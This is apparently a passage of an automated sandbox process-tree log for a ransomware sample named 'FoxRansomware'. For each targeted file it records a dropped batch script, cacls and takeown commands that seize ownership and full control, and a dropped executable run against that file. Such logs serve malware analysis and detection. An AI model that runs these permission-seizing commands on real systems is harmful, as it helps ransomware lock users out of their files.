C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""2⤵PID:6040
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C3⤵PID:5888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"3⤵
- Modifies file permissions
PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner3⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner4⤵
- Executes dropped EXE
PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""2⤵PID:7152
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C3⤵PID:3208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"3⤵PID:5604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner3⤵PID:7140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C3⤵PID:6164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner3⤵PID:3492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner4⤵
- Executes dropped EXE
PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵
- System Location Discovery: System Language Discovery
PID:5024 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:6176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵
- Executes dropped EXE
PID:6212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:3516
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:6592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:7480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "watermark.png" -nobanner3⤵PID:7504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:1192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:5440
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:6268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:6272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml""2⤵PID:5884
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml" /E /G Admin:F /C3⤵PID:5804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml"3⤵
- Modifies file permissions
PID:6336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKPOINTDATA.xml" -nobanner3⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKPOINTDATA.xml" -nobanner4⤵
- Executes dropped EXE
PID:6360
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:6964
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:6936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵PID:6420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:6448
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵
- Executes dropped EXE
PID:4092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:6484
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:6496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵PID:6564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edb.chk" -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:6552 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edb.chk" -nobanner4⤵
- Executes dropped EXE
PID:6560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:6692
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:6752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵PID:6760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:6956
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:6952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵PID:6960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:6972
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:8088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:4220
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵
- System Location Discovery: System Language Discovery
PID:832 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:7192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵PID:7832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:7820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵
- Executes dropped EXE
PID:6596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""2⤵PID:7844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C3⤵PID:7376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"3⤵PID:5596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000D.bin" -nobanner3⤵PID:7396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000D.bin" -nobanner4⤵
- Executes dropped EXE
PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""2⤵PID:7328
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C3⤵PID:4300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"3⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000P.bin" -nobanner3⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000P.bin" -nobanner4⤵
- Executes dropped EXE
PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""2⤵PID:1644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C3⤵PID:7296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"3⤵PID:7900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000013.bin" -nobanner3⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000013.bin" -nobanner4⤵PID:8004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin""2⤵PID:5908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin" /E /G Admin:F /C3⤵
- System Location Discovery: System Language Discovery
PID:7960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin"3⤵PID:7600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000006F.bin" -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:280 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000006F.bin" -nobanner4⤵PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin""2⤵PID:7828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin" /E /G Admin:F /C3⤵PID:7728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin"3⤵PID:7712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000006P.bin" -nobanner3⤵PID:7732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000006P.bin" -nobanner4⤵PID:7724
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin""2⤵PID:7672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin" /E /G Admin:F /C3⤵PID:7912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin"3⤵PID:7988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000073.bin" -nobanner3⤵PID:8048
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000073.bin" -nobanner4⤵PID:8000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin""2⤵PID:8112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin" /E /G Admin:F /C3⤵PID:32
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin"3⤵
- System Location Discovery: System Language Discovery
PID:8172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000081.bin" -nobanner3⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000081.bin" -nobanner4⤵PID:8116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin""2⤵PID:5632
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin" /E /G Admin:F /C3⤵PID:7096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin"3⤵PID:6116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000009D.bin" -nobanner3⤵PID:7064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000009D.bin" -nobanner4⤵PID:7088
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin""2⤵PID:5844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin" /E /G Admin:F /C3⤵PID:3168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin"3⤵
- Modifies file permissions
PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000AJ.bin" -nobanner3⤵PID:4996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000AJ.bin" -nobanner4⤵PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin""2⤵PID:688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin" /E /G Admin:F /C3⤵PID:5360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin"3⤵PID:4056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000AV.bin" -nobanner3⤵PID:2020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000AV.bin" -nobanner4⤵PID:3504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""2⤵PID:5624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C3⤵PID:6004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"3⤵PID:1536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000G.bin" -nobanner3⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000G.bin" -nobanner4⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""2⤵PID:5020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C3⤵PID:5688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"3⤵PID:5572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000R.bin" -nobanner3⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000R.bin" -nobanner4⤵PID:5240
-
-
-
